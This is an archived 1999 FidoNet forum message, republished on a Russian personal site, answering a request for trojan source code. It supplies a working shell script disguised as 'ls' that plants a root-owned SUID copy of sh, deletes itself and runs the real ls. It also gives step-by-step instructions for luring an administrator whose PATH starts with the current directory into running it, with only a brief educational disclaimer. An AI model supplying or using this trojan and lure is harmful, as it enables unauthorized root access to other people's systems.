DiBR
обычная кошмарная
домашняя страничка
Ежекакполучится околокомпьютерное обозрение
 
  <<<  предыдущий Tech! archive #865 следующий  >>>  
   Последний выпуск       Архив       Ссылки       Полезности       humor.filtered       Фотки       О сайте   
          Это - достаточно беспорядочный архив сообщений конференций сети fidonet, которые на момент их прочтения мной показались полезными или интересными. Многие устарели, многие узкоспецифичны и малоинтересны, но может оказаться и что-то новое...
         
- __techs (2:5015/42) ----------------------------------------------- __techs -
Msg  : 865 of 1000                         Scn
From : Vladislav Myasnyankin               2:5080/101.8    29 Sep 99  11:10:00
To   : Artem Abramov                                       01 Oct 99  19:02:14
Subj : Source need
-------------------------------------------------------------------------------
@AREA:RU.NETHACK
Hi, Artem!

Tuesday September 28 1999 17:41, Artem Abramov wrote to All:

AA> Hарод, может ли кто-нть из вас скинуть мне на мыло Си'шные исходники
AA> какого-либо простинького трояна? Hеобходимо для того, что бы разобраться в
AA> работе некоторых функций.
Погоди. Троян - это программа, якобы предназначенная для одного, а на самом
деле делающая другое. Какие тут специальные функции ? TrojanInit() ? :))

Принцип трояна виден из приведенного ниже скрипта для sh.

========= begin ls =========
#!/bin/sh
cp /bin/sh /home/mvv
chown root.root /home/mvv/sh
chmod 6755 /home/mvv/sh
rm ls
/bin/ls $*
=========== end ============

ls - юниксовая команда, выводящая список содержимого каталога (аналог досовской
dir). Только dir в ДОСе встроенная, а ls в юниксе - внешняя.

Академический пример использования приведенного трояна основан на
лени/невнимательности/тупости админа.
Юзер mvv создает в каталоге, доступном ему на запись (например, /tmp),
исполнимый файл с именем ls и приведенным выше содержимым (пути до домашнего
каталога и т.п. корректируются по месту). Там же создается файл с заковыристым
именем. Потом звонит админу и говорит, что не может его (заковыристый файл)
удалить. Теперь внимание !
Если у админа в переменной path на первом месте стоит точка (текущий каталог) -
он попал конкретно. Ибо что первое сделает админ ? Зайдет в указанный каталог и
наберет ls. Запустится не /bin/ls (как он думает), а наш троян. Он создаст у
юзера в каталоге копию шелла с владельцем рутом и SUID/SGUID-битами, удалит
себя и запустит настоящий ls. Админ поругает бестолкового юзера, грохнет файл и
пойдет играть дальше. А юзер получит копию sh, запустив которую он сможет
выполнять команды от рута.

Пояснения.
1. Работает только для бестолковых админов (а таких все меньше).
2. В линуксе почти бесполезен, т.к. бестолковые админы используют mc, а не
командную строку.
3. В каталоге /tmp фокус может не проканать, т.к. часто его монтируют с опцией
noexec.
4. Hекоторые шеллы (csh в частности) не хотят работать (csh говорит: permission
denied).

DISCLAMER. Это все только в учебных целях. Hапоминаю про статью УК РФ об
ответственности за неправомерный доступ к компьютерной информации :)

Hе плюй в колодец - вылетит не поймаешь.
_________________
With best regards, Vladislav
PGP key fingerprint  90 52 AB 1F 30 C7 10 83  AF 43 1D 9F 7A 10 36 6C

--- GEcho 1.02+
* Origin: Free Walking Wild Cat (2:5080/101.8)






<<<

архив dibr

>>>'